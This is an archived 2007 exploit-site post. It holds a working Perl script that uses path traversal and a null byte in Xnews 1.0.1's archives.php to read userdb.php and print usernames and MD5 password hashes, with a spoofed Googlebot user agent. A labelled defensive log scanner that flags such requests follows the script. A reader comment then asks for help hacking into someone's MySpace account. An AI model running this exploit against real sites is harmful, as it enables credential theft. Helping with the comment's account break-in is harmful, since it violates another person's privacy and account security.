_ _ 05.12.2008
 
News Item

Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit

Feb 21 2007 09:46:38
Source: ace
#################################################################################################
# r0ut3r Presents..
#
# #
# Another r0ut3r discovery! #
# writ3r [at] gmail.com #
# #
# XNews Remote File Disclosure Exploit #
#################################################################################################
# Software: Xnews 1.0.1 #
# #
# Vendor: http://xpression.hogsmeade-village.com/ #
# #
# Released: 2007/01/28 #
# #
# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com) #
# #
# Note: The information provided in this document is for Xnews administrator #
# testing purposes only! #
# #
# Whats up Timq, tgo, str0ke, dr max virus #
#################################################################################################

use IO::Socket;

$port = "80"; # connection port
$target = shift; # xpression.hogsmeade-village.com
$folder = shift; # /demo/

sub Header()
{
    print q
{Xpression News File Disclosure Exploit - writ3r [at] gmail.com
--------------------------------------------------------------
};
}

sub Usage()
{
    print q
{Usage: xnewsxpl.pl [target] [directory]
Example: xnewsxpl.pl xpression.hogsmeade-village.com /demo/
};
    exit();
}

Header();

if (!$target || !$folder) {
    Usage(); }

$res = false;
print "[+] Connecting...\r\n";
$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt. Exiting...\r\n";
print $xpack "GET ".$folder."archives.php?xnews-template=../userdb.php%00 HTTP/1.1\n";
print $xpack "Host: $target\n";
print $xpack "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n";
print $xpack "Accept: text/html\n";
print $xpack "Connection: keep-alive\n\n\r\n";

while (<$xpack>)
{
    if (/(.*?)\|(.*?)\|(.*?)\|/) {
        print "Username: $1\n";
        print "MD5 Hash: $3\n";
        $res = true;
        exit; }

}
if ($res eq false) {
    print "[-] Exploit failed - Not vulnerable\n"; }

print "[!] Connection to host lost...\n";
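
A log check for the request this script sends (`archives.php` with an `xnews-template` value containing `../` and `%00`), added here as an example for Xnews administrators; it is not part of the original post or the exploit author's code. The log lines are constructed, the Combined Log Format layout is an assumption about the web server, and the function names are illustrative.

```python
import re
from urllib.parse import unquote, urlsplit

# Client, request target and status from a Common/Combined Log Format line.
LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is seen."""
    for _ in range(rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def template_findings(raw_value):
    """Return why an xnews-template value looks like a file-read attempt."""
    value = fully_decode(raw_value).replace("\\", "/")
    findings = []
    if "\x00" in value:
        findings.append("null-byte")
    if ".." in value.split("/"):
        findings.append("traversal")
    return findings

def scan(lines):
    """Return (client, status, findings) for flagged archives.php requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/archives.php"):
            continue
        # Walk the raw query so %00 is still visible when we decode it.
        for pair in url.query.split("&"):
            name, _, raw = pair.partition("=")
            if fully_decode(name) == "xnews-template" and (f := template_findings(raw)):
                hits.append((client, int(status), f))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [21/Feb/2007:09:46:38 +0000] "GET /demo/archives.php?xnews-template=../userdb.php%00 HTTP/1.1" 200 512 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"',
    '198.51.100.7 - - [21/Feb/2007:09:50:02 +0000] "GET /demo/archives.php?xnews-template=archive HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [21/Feb/2007:10:01:11 +0000] "GET /demo/archives.php?page=2&xnews-template=%252e%252e%252fuserdb.php%2500 HTTP/1.1" 404 0 "-" "curl/7.15"',
]
```

A flagged request that was answered with status 200 deserves triage first, since the script above prints a username and MD5 hash taken from the response. The User-Agent is not used as a signal because the script sets it to a Googlebot string.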

Comments
#1 jacki1 04.17.2007  
I was going to type something untrue because I did not want other people to know why I wanted and need help with hacking into someone's profile on MySpace, but my reason is I think my child is on drugs. Please help me, I need your help with this. I do not want to lose my child. I have no one to ask. Thank you for your time. My email is vergarajackie1@hotmail.com